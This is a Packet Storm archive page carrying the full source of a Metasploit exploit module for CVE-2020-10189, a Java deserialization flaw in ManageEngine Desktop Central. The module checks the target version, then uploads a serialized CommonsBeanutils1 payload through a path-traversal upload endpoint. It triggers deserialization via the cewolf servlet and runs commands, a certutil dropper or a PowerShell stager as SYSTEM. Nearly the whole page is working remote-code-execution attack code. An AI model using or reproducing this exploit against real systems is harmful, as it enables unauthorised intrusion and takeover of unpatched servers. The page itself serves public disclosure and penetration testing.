what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine Desktop Central Java Deserialization

ManageEngine Desktop Central Java Deserialization
Posted Mar 14, 2020
Authored by mr_me, wvu | Site metasploit.com

This Metasploit module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. Tested against 10.0.465 x64.

tags | exploit, java
advisories | CVE-2020-10189
SHA-256 | 1b4d937c85f3beaac187c7d1a0baa59b7627812c7cd91b156f52ad23a8958285

ManageEngine Desktop Central Java Deserialization

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::CmdStager
include Msf::Exploit::Powershell
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Desktop Central Java Deserialization',
'Description' => %q{
This module exploits a Java deserialization vulnerability in the
getChartImage() method from the FileStorage class within ManageEngine
Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.

"The short-term fix for the arbitrary file upload vulnerability was
released in build 10.0.474 on January 20, 2020. In continuation of that,
the complete fix for the remote code execution vulnerability is now
available in build 10.0.479."
},
'Author' => [
'mr_me', # Discovery and exploit
'wvu' # Module
],
'References' => [
['CVE', '2020-10189'],
['URL', 'https://srcincite.io/advisories/src-2020-0011/'],
['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],
['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],
['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']
],
'DisclosureDate' => '2020-03-05', # 0day release
'License' => MSF_LICENSE,
'Platform' => 'windows',
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
['Windows Command',
'Arch' => ARCH_CMD,
'Type' => :win_cmd
],
['Windows Dropper',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :win_dropper
],
['PowerShell Stager',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :psh_stager
]
],
'DefaultTarget' => 2,
'DefaultOptions' => {
'RPORT' => 8383,
'SSL' => true,
'WfsDelay' => 60 # It can take a little while to trigger
},
'CmdStagerFlavor' => 'certutil', # This works without issue
'Notes' => {
'PatchedVersion' => Gem::Version.new('100474'),
'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?
'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
))

register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'configurations.do')
)

unless res
return CheckCode::Unknown('Target is not responding to check')
end

unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')
return CheckCode::Unknown('Target is not running Desktop Central')
end

version = res.get_html_document.at('//input[@id = "buildNum"]/@value')&.text

unless version
return CheckCode::Detected('Could not detect Desktop Central version')
end

vprint_status("Detected Desktop Central version #{version}")

if Gem::Version.new(version) < notes['PatchedVersion']
return CheckCode::Appears("#{version} is an exploitable version")
end

CheckCode::Safe("#{version} is not an exploitable version")
end

def exploit
# NOTE: Automatic check is implemented by the AutoCheck mixin
super

print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")

case target['Type']
when :win_cmd
execute_command(payload.encoded)
when :win_dropper
execute_cmdstager
when :psh_stager
execute_command(cmd_psh_payload(
payload.encoded,
payload.arch.first,
remove_comspec: true
))
end
end

def execute_command(cmd, _opts = {})
# XXX: An executable is required to run arbitrary commands
cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper

vprint_status("Serializing command: #{cmd}")

# I identified mr_me's binary blob as the CommonsBeanutils1 payload :)
serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(
'CommonsBeanutils1',
cmd
)

# XXX: Patch in expected serialVersionUID
serialized_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e"

# Rock 'n' roll!
upload_serialized_payload(serialized_payload)
deserialize_payload
end

def upload_serialized_payload(serialized_payload)
print_status('Uploading serialized payload')

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,
'/mdm/client/v1/mdmLogUploader'),
'ctype' => 'application/octet-stream',
'vars_get' => {
'udid' => 'si\\..\\..\\..\\webapps\\DesktopCentral\\_chart',
'filename' => 'logger.zip'
},
'data' => serialized_payload
)

unless res && res.code == 200
fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')
end

print_good('Successfully uploaded serialized payload')

# C:\Program Files\DesktopCentral_Server\bin
register_file_for_cleanup('..\\webapps\\DesktopCentral\\_chart\\logger.zip')
end

def deserialize_payload
print_status('Deserializing payload')

res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'cewolf/'),
'vars_get' => {'img' => '\\logger.zip'}
)

unless res && res.code == 200
fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')
end

print_good('Successfully deserialized payload')
end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close